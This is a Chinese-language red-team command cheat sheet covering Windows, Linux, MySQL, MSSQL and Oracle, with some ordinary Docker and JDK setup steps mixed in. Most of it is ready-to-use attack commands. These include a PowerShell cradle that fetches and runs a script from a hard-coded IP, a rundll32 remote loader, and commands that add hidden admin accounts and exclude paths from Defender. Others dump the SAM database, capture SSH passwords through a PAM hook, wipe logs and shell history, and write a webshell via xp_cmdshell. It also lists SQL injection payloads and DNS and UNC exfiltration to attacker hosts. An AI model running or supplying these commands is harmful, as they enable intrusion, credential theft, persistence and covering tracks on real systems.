红队命令速查-洞查文库

Windows 命令速查

TCP 出网探测

powershell Test-NetConnection -ComputerName [目标主机名或IP] -Port [端口号]

远程下载文件

certutil

certutil.exe -urlcache -split -f "http://127.0.0.1:8080/file.exe" "C:/Windows/temp/file.exe"

//从 http://127.0.0.1:8080/ 下载 file.exe 并保存到 C:/Windows/temp/file.exe

PowerShell

powershell -Command "Invoke-WebRequest -Uri 'https://www.example.com/file.zip' -OutFile 'C:\Downloads\file.zip'"

BitsAdmin

bitsadmin /transfer "JobName" /download /priority normal https://www.example.com/file.zip C:\path\to\save\file.zip

rundll32

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.3.150/chfs/shared/1Z3.exe",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

IIS 网站查询

查看 IIS 绑定的网站:

%windir%\system32\inetsrv\appcmd.exe list sites

查看 Site ID 为 1 的物理路径:

%windir%\system32\inetsrv\appcmd list site /site.id:1 /config | findstr "physicalPath"

IIS 配置文件:

C:\Windows\System32\inetsrv\config\applicationHost.config
%SystemRoot%\System32\inetsrv\config\applicationHost.config

查看 Windows 系统版本:

wmic os get Caption,osarchitecture

修改文件时间

powershell -command "(Get-Item 'C:\path\to\your\file.txt').CreationTime = '2024-01-01 12:00 AM'; (Get-Item 'C:\path\to\your\file.txt').LastWriteTime = '2024-01-02 12:00 AM'"

进程操作

查看端口对应 PID:

netstat -ano | findstr :80

查看 PID 对应程序:

tasklist /FI "PID eq 1234"

根据 PID 查看程序所在目录:

wmic process where ProcessId=1234 get ExecutablePath

执行进程:

start /b  xxx.exe

根据名称结束进程:

taskkill /f /t /im GotoHTTP.exe

搜索进程

tasklist | findstr "powershell"

Powershell 无窗口执行 EXE

powershell -executionPolicy bypass Start-Process -WindowStyle hidden -FilePath 'C:/Windows/temp/rd.exe'

net 命令

查看用户列表: net user
powershell查看用户列表: Get-WmiObject -Class Win32_UserAccount
查看用户组列表: net localgroup
查看管理组列表: net localgroup Administrators
添加用户并设置密码: net user test P@ssw0rd /add
将用户加入管理组: net localgroup Administrators test /add
将用户加入桌面组: net localgroup "Remote Desktop Users" guest /add
激活guest用户: net user guest /active:yes
更改guest用户的密码: net user guest P@ssw0rd
将用户加入管理组: net localgroup administrators guest /add
将用户加入桌面组: net localgroup "Remote Desktop Users" guest /add
查看本地密码策略: net accounts
查看当前会话: net session
建立IPC会话: net use \\127.0.0.1\c$ "P@ssw0rd" /user:"domain\Administrator"

netsh 操作防火墙

查看防火墙配置:

netsh firewall show config

Windows Server 2003 及之前的版本,允许指定程序全部连接

netsh firewall add allowedprogram C:\nc.exe "allow nc" enable

Windows Server 2003之后的版本

netsh advfirewall firewall add rule name="pass nc" dir in action=allow program="C:\nc.exe

允许3389放行

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

WIndows Defender 加白排除目录:

C:\Windows\System32\wbem\wmic.exe /Node:localhost /Namespace:\\Root\Microsoft\Windows\Defender Path MSFT_MpPreference call Add ExclusionPath=C:\

powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath "C:\test"

文件写入

echo test > C:\test.txt //写入-覆盖
echo test >> c:\test.txt //追加有换行
set /p=test<nul>C:\test.txt //写入
set /p="121d2">>C:\test.txt //不换行追加

//powershell不换行追加
powershell -Command "[System.IO.File]::AppendAllText('C:\windows\temp\111.txt', 'test')"

//规避空格
echo.123>>a.txt
echo,123>>a.txt
type;a.txt

//将base64编码的文件解码写入到 test.jsp
certutil -f -decode base64.txt C:\\test.jsp

//将十六进制文件解码写入到 test.jsp
certutil -decodehex hex.txt C:\\test.jsp

注册表:

Restricted Admin Mode

对应命令行开启 Restricted Admin mode 命令如下:
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

查看是否已开启 DisableRestrictedAdmin REG_DWORD 0x0 存在就是开启
REG query "HKLM\System\CurrentControlSet\Control\Lsa" | findstr "DisableRestrictedAdmin"

查看3389端口

REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

https://forum.ywhack.com/coding.php 端口查询

开启远程桌面

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

或者

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

导出 SAM 数据库

reg save HKLM\SYSTEM sys.hiv
reg save HKLM\SAM sam.hiv

复制:
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SAM

使用 https://github.com/3gstudent/NinjaCopy 进行复制。

lsadump::sam /sam:sam.hiv /system:system.hiv

查看盘符剩余空间

## 大小为字节磁盘
::查看C盘
wmic LogicalDisk where "Caption='C:'" get FreeSpace,Size /value
::查看D盘
wmic LogicalDisk where "Caption='D:'" get FreeSpace,Size /value

搜索文件:

#搜索 D 盘下名为 shell.jsp 的文件
cd /d D:\ && dir /b /s shell.jsp

#搜素 D 盘下后缀为 conf 内容且包含 password(不区分大小写):
findstr /s /i /n /d:D:\ "password" *.conf

CS 上线

powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString('http://122.114.55.117:8012/download/upload.ps1')
msiexec /q /i http://127.0.0.1:8080/ms10-051.msi

设置文件属性

attrib +s +a +h +r cs.exe // 给文件设置系统文件属性、存档文件属性、隐藏文件属性、只读文件属性

计划任务

schtasks /create /ru system /tn "Microsoft\Windows\Multimedia\SystemMediaService" /sc ONSTART /tr "C:\cs.exe" 
// 创建一个名为Microsoft\Windows\Multimedia\SystemMediaService,开机时执行 c:\cs.exe 的计 划任务,需要管理员权限

schtasks /change /tn "Microsoft\Windows\Multimedia\SystemSoundsService" /ru system /tr "C:\cs.exe" /enable 
// 修改Microsoft\Windows\Multimedia\SystemSoundsService 计划任务,需要管理员权限, 更改任务无法通过 /sc、/mo 参数更改计划频率

RDP 凭据

#列出所有 RDP 凭证
C:\Users\用户名\AppData\Local\Microsoft\Credentials

dir /a C:\Users\Administrator\AppData\Local\Microsoft\Credentials

Windows 打包目录上传文件

powershell -Command "Compress-Archive -Path E:\update\ -DestinationPath E:\test.zip"

7z.exe a -r -p12345 C:\webs\1.7z C:\webs\

zip -r C:\webs\1.zip C:\webs\

域渗透命令

whoami /user  //查看当前用户权限
net config workstation  //可知域名和其他信息
net user /domain  //查询域用户
net user edgeuser Admin12345 /add /domain  //添加域用户
net group "domain admins" edgeuser /add /domain  //添加域管理员
net group "enterprise admins" edgeuser /add /domain  //添加企业管理员
net group "domain admins" /domain  //查询域管理员用户
net group "enterprise admins" /domain  //查询域企业管理组
net localgroup administrators /domain  //查询域本地管理组
net time /domain  //查询域控制器和时间
net view /domain  //查询域名称
net view /domain:redteam.local  //查询域内计算机
net group "domain computers" /domain  //查看当前域内计算机列表
net group "domain controllers" /domain  //查看域控机器名
net accounts /domain  //查看域密码策略
nltest /domain_trusts  //查看域信任
nltest /domain_trusts /all_trusts /v /server:10.10.10.10  //查看某个域的域信任
nslookup -type=SRV _ldap._tcp.corp  //通过srv记录查找域控制器

Linux 命令速查

本次不记录命令

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0

常用日志清理

echo > /var/log/btmp;echo > /var/log/wtmp;echo > /var/log/lastlog;echo > /var/log/utmp;echo > /var/log/syslog;cat /dev/null > /var/log/secure;cat /dev/null > /var/log/message;echo ok
  • /var/log/btmp 记录所有登录失败信息,使用lastb命令查看
  • /var/log/lastlog 记录系统中所有用户最后一次登录时间的日志,使用lastlog命令查看
  • /var/log/wtmp 记录所有用户的登录、注销信息,使用last命令查看
  • /var/log/utmp 记录当前已经登录的用户信息,使用w,who,users等命令查看
  • /var/log/secure 记录与安全相关的日志信息
  • /var/log/message 记录系统启动后的信息和错误日志

Web 日志清理

直接替换日志ip地址:
sed -i 's/127.0.0.1/192.168.1.1/g' access.log

清除部分相关日志:
使用grep -v来把相关信息删除:
cat /var/log/nginx/access.log | grep -v evil.php > tmp.log

把修改过的日志覆盖到原日志文件:
cat tmp.log > /var/log/nginx/access.log

设置终端代理

export https_proxy=http://127.0.0.1:7890 http_proxy=http://127.0.0.1:7890 all_proxy=socks5://127.0.0.1:7890

查看用户登录记录

last

root 权限创建管理员用户

sudo useradd -m testt && echo "testt:admin@123" | sudo chpasswd && sudo usermod -aG wheel testt

cURL/wget 下载文件

wget -P /tmp/ http://x.x.x.x:8080/shell
curl -o /tmp/xxx http://x.x.x.x:8080/shell

curl/wget 发送文件

curl -X POST --data-binary @file.txt http://localhost:9000

wget --post-file=file.txt http://localhost:9000

curl -T file.txt http://localhost:9000
import socket

def start_server(host, port, buffer_size=1024):
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.bind((host, port))
    server_socket.listen(5)
    print(f"服务器正在 {host}:{port} 监听...")

    while True:
        client_socket, addr = server_socket.accept()
        print(f"连接来自 {addr}")

        # 读取HTTP请求头
        request = b""
        while b"\r\n\r\n" not in request:
            request += client_socket.recv(buffer_size)

        headers, file_data = request.split(b"\r\n\r\n", 1)

        # 提取文件名(可以根据实际需求修改提取方式)
        file_name = "received_file"  # 默认文件名

        # 保存文件
        with open(file_name, 'wb') as f:
            f.write(file_data)
            while True:
                data = client_socket.recv(buffer_size)
                if not data:
                    break
                f.write(data)

        print(f"文件 {file_name} 已保存")
        client_socket.close()

if __name__ == "__main__":
    HOST = '0.0.0.0'
    PORT = 9000
    start_server(HOST, PORT)

文件时间修改

修改 /www/wwwroot/shell.php 时间为 2024.05.16.24

touch -t 202405161200.24 /www/wwwroot/shell.php

查看 DNS 服务器

cat /etc/resolv.conf

停止防火墙

systemctl stop firewalld
service iptables stop

ubuntu:
ufw disable

搜索敏感信息

find / -regex ".*\.properties\|.*\.conf\|.*\.config\|.*\.yaml\|.*\.sh|.*\.jsp|.*\.log|.*\.txt|.*\.xml" | xargs grep -E "=jdbc:|pass=|passwd=|aliyun|password"

echo 写文件

//直接 echo 写入:
echo xxx > /www/xxx.jsp

//base64 写入:
echo eHh4ZGFzMQ== | base64 -d > /www/xxx.jsp

//追加
echo xxx >> /www/xxx.jsp

在线编码:https://forum.ywhack.com/coding.php

写入 ssh 公钥:

echo c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFEazRVTjhFUTFXOFBWMQ== | base64 -d > authorized_keys
//使用  printf 在末尾处插入,如需换行可添加\n
//参考https://baijiahao.baidu.com/s?id=1727019063436737118&wfr=spider&for=pc

printf "ssh-rsa xxx" >> /root/.ssh/authorized_keys

压缩打包文件

//将 /home/mail /home/web 两个目录打包至 /tmp 目录下命名为web.tar.gz
tar czvf /tmp/web.tar.gz /home/mail /home/web

//zip
zip -r /tmp/web.zip /home/mail /home/web

//可使用 -x 排除,如:
zip -r /tmp/web.zip /home/mail /home/web -x /home/mail/test.txt -x /home/web/log/*

分割上传

split -n 3 fscan  //分割为 3 个文件
split -b 500k fscan  //以 500 K 大小分割 fscan

Windows 合并:
copy /b xaa+xab fscan
type xaa xab > fscan

Linux 合并:
cat xaa xab > fscan

十六进制获取文件

# 将文件转换为十六进制
xxd -p filename 
# 本地还原:
xxd -p -r filename > aa.tar.gz

pam_exec 抓 SSH 密码

需要关闭 SELinux:

setenforce 0 # 关闭
setenforce 1 # 开启

修改 /etc/pam.d/sshd 第一行添加:

auth optional pam_exec.so quiet expose_authtok /tmp/sshd.sh

/tmp/sshd.sh:

chmod 777 /tmp/sshd.sh

#!/bin/sh

echo "$(date) $PAM_USER $(cat -) $PAM_RHOST $PAM_RUSER" >> /tmp/123.log

Debian/Ubuntu Docker 安装

Debian 12 / Ubuntu 24.04 安装 Docker 以及 Docker Compose

安装一些必要的软件包

apt update
apt upgrade -y
apt install curl vim wget gnupg dpkg apt-transport-https lsb-release ca-certificates

加入 Docker 的 GPG 公钥和 apt 源

Debian:
curl -sSL https://download.docker.com/linux/debian/gpg | gpg --dearmor > /usr/share/keyrings/docker-ce.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-ce.gpg] https://download.docker.com/linux/debian $(lsb_release -sc) stable" > /etc/apt/sources.list.d/docker.list

Ubuntu:
curl -sSL https://download.docker.com/linux/debian/gpg | gpg --dearmor > /usr/share/keyrings/docker-ce.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-ce.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -sc) stable" > /etc/apt/sources.list.d/docker.list

国内机器可以用清华 TUNA 的国内源:

Debian:
curl -sS https://download.docker.com/linux/debian/gpg | gpg --dearmor > /usr/share/keyrings/docker-ce.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-ce.gpg] https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian $(lsb_release -sc) stable" > /etc/apt/sources.list.d/docker.list

Ubuntu:
curl -sS https://download.docker.com/linux/debian/gpg | gpg --dearmor > /usr/share/keyrings/docker-ce.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-ce.gpg] https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/ubuntu $(lsb_release -sc) stable" > /etc/apt/sources.list.d/docker.list

然后更新系统后即可安装 Docker CE 和 Docker Compose 插件

apt update
apt install docker-ce docker-ce-cli containerd.io docker-compose-plugin

安装 Docker Compose

curl -L https://github.com/docker/compose/releases/latest/download/docker-compose-Linux-x86_64 > /usr/local/bin/docker-compose
chmod +x /usr/local/bin/docker-compose

JDK 安装

ubuntu18运行
sudo apt install openjdk-11-jre-headless
sudo apt install openjdk-11-jdk
手动
tar -xzvf jdk-13.0.2_linux-x64_bin.tar.gz
cd jdk-13.0.2/
pwd
vim /etc/profile

export JAVA_HOME=/root/jdk-13.0.2
export CLASSPATH=$:CLASSPATH:$JAVA_HOME/lib/ export PATH=$PATH:$JAVA_HOME/bin

source /etc/profile

数据库命令速查

mysql

mysql 查连接 IP

SELECT * FROM performance_schema.hosts;
show full processlist;

mysql 查最大数量表

select table_name,table_rows,table_schema,table_comment from  information_schema.tables order by table_rows desc;

查询 user 字段在哪个库哪个表

SELECT 
    TABLE_SCHEMA AS database_name,
    TABLE_NAME AS table_name,
    COLUMN_NAME AS column_name
FROM 
    INFORMATION_SCHEMA.COLUMNS
WHERE 
    COLUMN_NAME LIKE '%user%';

统计访问过的表次数

//库名,表名,访问次数
select table_schema,table_name,sum(io_read_requests+io_write_requests) io from sys.schema_table_statistics group by table_schema,table_name order by io desc;

查看写入权限

mysql> show global variables like '%secure%';
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_auth      | ON    |
| secure_file_priv |          |    可写入
| secure_file_priv | NULL |   不可写入
+------------------+-------+
SHOW VARIABLES LIKE "secure_file_priv";
  • NULL,表示禁止。
  • 如果value值有文件夹目录,则表示只允许该目录下文件,测试子目录也不行。
  • 如果为空,则表示不限制目录。

不登录执行 sql

mysql -uaHmin -proot test -e "select now()" -N >H:/work/target1.txt
mysql -uroot -e "show databases;" >1.txt

基础命令

显示版本: select version();
显示字符集: select @@character_set_database;
显示数据库: show databases;
显示表名: show tables;
显示字段: show columns from table_name;
显示计算机名: select @@hostname;
系统版本: select @@version_compile_os;
mysql路径: select @@basedir;
数据库路径: select @@datadir;
describe describe table_name;
显示root密码: select User,Password from mysql.user;
导入文件: select load_fie(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C);
导出文件: select 'testtest' into outfile '/var/www/html/test.txt' from mysql.user;
开启外连: GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;
mysql安装路径: show variables;   
更新数据库: UPDATE `DX15`.`dx15_common_member` SET `uid` = '1' WHERE `dx15_common_member`.`uid` =40407;更新40407uid变成uid1
mysql更改root密码: mysqladmin -u root password "newpwd";
查询表: select concat(User,0x3a,Password) from mysql.user; 
获取数据库所有表: SHOW TABLES FROM `databases`;
获取列前20行: SELECT * FROM `admin_bbs` ORDER BY 1 DESC LIMIT 0,20;
获取表行数: SELECT COUNT(*) AS CNT FROM `dede_admin`;

sql server

相关工具:

xp_cmdshell

SQL Server 2005 之前版本,xp_cmdshell 默认开启:

exec master..xp_cmdshell 'whoami';

判断是否存在 xp_cmdshell 存储过程,返回1表示存在,否则表示不存在:

select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell';

删除 xp_cmdshell:

exec master..sp_dropextendedproc xp_cmdshell;

恢复 xp_cmdshell:

exec master..xp_dropextendedproc xp_cmdshell,@dllname='xplog70.dll' declare @o int;

SQL Server 2005之后的版本中,xp_cmdshell 默认关闭,需要手动开启,开启xp_cmdshell需要sa权限:

# 允许修改高级参数
exec sp_configure 'show advanced options',1;
# 配置生效
RECONFIGURE;
# 开启xp_cmdshell
exec sp_configure 'xp_cmdshell',1;
# 配置生效
RECONFIGURE;
# 检查是否开启
exec sp_configure;
# 执行系统命令
exec master..xp_cmdshell 'whoami';
# 获取webshell
exec master..xp_cmdshell 'echo  ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > c:\\WWW\\test.aspx'

MSSQL 默认数据库

Name描述
pubs在 MSSQL 2005 中不可用
model在所有版本中可用
msdb在所有版本中可用
tempdb在所有版本中可用
northwind在所有版本中可用
information_schema从 MSSQL 2000 及更高版本开始可用

MSSQL 注释

Type描述
/* MSSQL Comment */C-style 注释
-- -SQL 注释
;%00Null byte

MSSQL 用户

SELECT CURRENT_USER
SELECT user_name();
SELECT system_user;
SELECT user;

MSSQL 版本查看

SELECT @@version

MSSQL 主机名

SELECT HOST_NAME()
SELECT @@hostname
SELECT @@SERVERNAME
SELECT SERVERPROPERTY('productversion')
SELECT SERVERPROPERTY('productlevel')
SELECT SERVERPROPERTY('edition');

MSSQL 数据库名

SELECT DB_NAME()

MSSQL 数据库凭证

  • MSSQL 2000: Hashcat mode 131: 0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578
    sql SELECT name, password FROM master..sysxlogins SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins -- Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer
  • MSSQL 2005: Hashcat mode 132: 0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe
    sql SELECT name, password_hash FROM master.sys.sql_logins SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins

MSSQL 列出数据库

SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); — for N = 0, 1, 2, …
SELECT STRING_AGG(name, ', ') FROM master..sysdatabases; -- Change delimeter value such as ', ' to anything else you want => master, tempdb, model, msdb   (Only works in MSSQL 2017+)

MSSQL 列出列

SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable

SELECT table_catalog, column_name FROM information_schema.columns

MSSQL 列出表

SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views
SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable

SELECT table_catalog, table_name FROM information_schema.columns
SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U'; -- Change delimeter value such as ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options  (Only works in MSSQL 2017+)

MSSQL 联合注入

-- extract databases names
$ SELECT name FROM master..sysdatabases
[*] Injection
[*] msdb
[*] tempdb

-- extract tables from Injection database
$ SELECT name FROM Injection..sysobjects WHERE xtype = 'U'
[*] Profiles
[*] Roles
[*] Users

-- extract columns for the table Users
$ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'Users')
[*] UserId
[*] UserName

-- Finally extract the data
$ SELECT  UserId, UserName from Users

MSSQL 报错注入

For integer inputs : convert(int,@@version)
For integer inputs : cast((SELECT @@version) as int)

For string inputs   : ' + convert(int,@@version) + '
For string inputs   : ' + cast((SELECT @@version) as int) + '

MSSQL 盲注

AND LEN(SELECT TOP 1 username FROM tblusers)=5 ; -- -

AND ASCII(SUBSTRING(SELECT TOP 1 username FROM tblusers),1,1)=97
AND UNICODE(SUBSTRING((SELECT 'A'),1,1))>64-- 
AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A'

AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90

SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'

WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)
SELECT message FROM data WHERE row = 1 and message like 't%'

MSSQL 时间注入

ProductID=1;waitfor delay '0:0:10'--
ProductID=1);waitfor delay '0:0:10'--
ProductID=1';waitfor delay '0:0:10'--
ProductID=1');waitfor delay '0:0:10'--
ProductID=1));waitfor delay '0:0:10'--

IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'
IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0';

MSSQL 堆栈查询

  • Without any statement terminator -- multiple SELECT statements SELECT 'A'SELECT 'B'SELECT 'C' -- updating password with a stacked query SELECT id, username, password FROM users WHERE username = 'admin'exec('update[users]set[password]=''a''')-- -- using the stacked query to enable xp_cmdshell -- you won't have the output of the query, redirect it to a file SELECT id, username, password FROM users WHERE username = 'admin'exec('sp_configure''show advanced option'',''1''reconfigure')exec('sp_configure''xp_cmdshell'',''1''reconfigure')--
  • Use a semi-colon “;” to add another query
    sql ProductID=1; DROP members--

MSSQL 读取文件

Permissions: The BULK option requires the ADMINISTER BULK OPERATIONS or the ADMINISTER DATABASE BULK OPERATIONS permission.

-1 union select null,(select x from OpenRowset(BULK 'C:\Windows\win.ini',SINGLE_CLOB) R(x)),null,null

MSSQL 命令执行

EXEC xp_cmdshell "net user";
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:';
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';

重新激活 xp_cmdshell(在 SQL Server 2005 中默认禁用)

EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;

与 MSSQL 实例交互。

sqsh -S 192.168.1.X -U sa -P superPassword
python mssqlclient.py WORKGROUP/Administrator:password@192.168.1X -port 46758

执行 Python 脚本

由与使用 xp_cmdshell 执行命令的用户不同的用户执行

#Print the user being used (and execute commands)
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
#Open and read a file
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
#Multiline
EXECUTE sp_execute_external_script @language = N'Python', @script = N'
import sys
print(sys.version)
'
GO

MSSQL 外带数据

MSSQL DNS 外带数据

Technique from https://twitter.com/ptswarm/status/1313476695295512578/photo/1

# Permissions: Requires VIEW SERVER STATE permission on the server.
1 and exists(select * from fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.xem',null,null))

# Permissions: Requires the CONTROL SERVER permission.
1 (select 1 where exists(select * from fn_get_audit_file('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\',default,default)))
1 and exists(select * from fn_trace_gettable('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.trc',default))

MSSQL UNC 路径

MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the xp_dirtree function to list the files in our SMB share and grab the NTLMv2 hash.

1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';-- 
xp_dirtree '\\attackerip\file'
xp_fileexist '\\attackerip\file'
BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
BACKUP DATABASE [TESTING] TO DISK = '\\attackeri\file'
RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
RESTORE DATABASE [TESTING] FROM DISK = '\\attackerip\file'
RESTORE HEADERONLY FROM DISK = '\\attackerip\file'
RESTORE FILELISTONLY FROM DISK = '\\attackerip\file'
RESTORE LABELONLY FROM DISK = '\\attackerip\file'
RESTORE REWINDONLY FROM DISK = '\\attackerip\file'
RESTORE VERIFYONLY FROM DISK = '\\attackerip\file'

MSSQL 提升权限为 DB 管理员

EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;

MSSQL 受信任链接

The links between databases work even across forest trusts.

msf> use exploit/windows/mssql/mssql_linkcrawler
[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter sessio

Manual exploitation

-- find link
select * from master..sysservers

-- execute query through the link
select * from openquery("dcorp-sql1", 'select * from master..sysservers')
select version from openquery("linkedserver", 'select @@version as version');

-- chain multiple openquery
select version from openquery("link1",'select version from openquery("link2","select @@version as version")')

-- execute shell commands
EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer
select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"')

-- create user and give admin privileges
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"

列出权限

列出当前用户在服务器上的有效权限。
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
列出当前用户在数据库上的有效权限。
SELECT * FROM fn_my_permissions (NULL, 'DATABASE');
列出当前用户在视图上的有效权限。
SELECT * FROM fn_my_permissions('Sales.vIndividualCustomer', 'OBJECT') ORDER BY subentity_name, permission_name;
检查当前用户是否属于指定的服务器角色。
-- possible roles: sysadmin, serveradmin, dbcreator, setupadmin, bulkadmin, securityadmin, diskadmin, public, processadmin
SELECT is_srvrolemember('sysadmin');

在查询中使用 SP_PASSWORD 以隐藏日志,如:' AND 1=1--sp_password

MSSQL OPSEC

-- 'sp_password' was found in the text of this event.
-- The text has been replaced with this comment for security reasons.

References

注:大部分内容翻译至:https://github.com/swisskyrepo/PayloadsAllTheThings

oracle

相关工具:

oracle查最大数量表

select t.table_name,t.tablespace_name,t.owner,t.num_rows from  all_tables t  ORDER BY NUM_ROWS DESC;

select t.table_name,t.tablespace_name,t.owner,t.num_rows from  all_tables t  ORDER BY NUM_ROWS DESC;
select t.table_name tableName, f.comments comments
  from user_tables t
 inner join user_tab_comments f
    on t.table_name = f.table_name

查询包含 user 字段在哪个库哪个表

SELECT 
    owner AS database_name,
    table_name,
    column_name
FROM 
    all_tab_columns
WHERE 
    column_name LIKE '%USER%'
ORDER BY 
    owner, table_name, column_name;

Oracle SQL 默认数据库

NameDescription
SYSTEM适用于所有版本
SYSAUX适用于所有版本

Oracle SQL 注释

TypeDescription
-- -SQL comment

Oracle SQL 版本

SELECT user FROM dual UNION SELECT * FROM v$version
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;

Oracle SQL 主机名

SELECT host_name FROM v$instance; (Privileged)
SELECT UTL_INADDR.get_host_name FROM dual;
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;
SELECT UTL_INADDR.get_host_address FROM dual;

Oracle SQL 数据库名称

SELECT global_name FROM global_name;
SELECT name FROM V$DATABASE;
SELECT instance_name FROM V$INSTANCE;
SELECT SYS.DATABASE_NAME FROM DUAL;

Oracle SQL 数据库凭证

SQL 语句描述
SELECT username FROM all_users;适用于所有版本
SELECT name, password from sys.user$;Privileged, <= 10g
SELECT name, spare4 from sys.user$;Privileged, <= 11g

Oracle SQL 列出数据库

SELECT DISTINCT owner FROM all_tables;

Oracle SQL 列出列

SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';

Oracle SQL 列出表

SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';

Oracle SQL 报错注入

DescriptionQuery
Invalid HTTP RequestSELECT utl_inaddr.get_host_name((select banner from v$version where rownum=1)) FROM dual
CTXSYS.DRITHSX.SNSELECT CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual
Invalid XPathSELECT ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual
Invalid XMLSELECT to_char(dbms_xmlgen.getxml('select "'&#124;&#124;(select user from sys.dual)&#124;&#124;'" FROM sys.dual')) FROM dual
Invalid XMLSELECT rtrim(extract(xmlagg(xmlelement("s", username &#124;&#124; ',')),'/s').getstringval(),',') FROM all_users
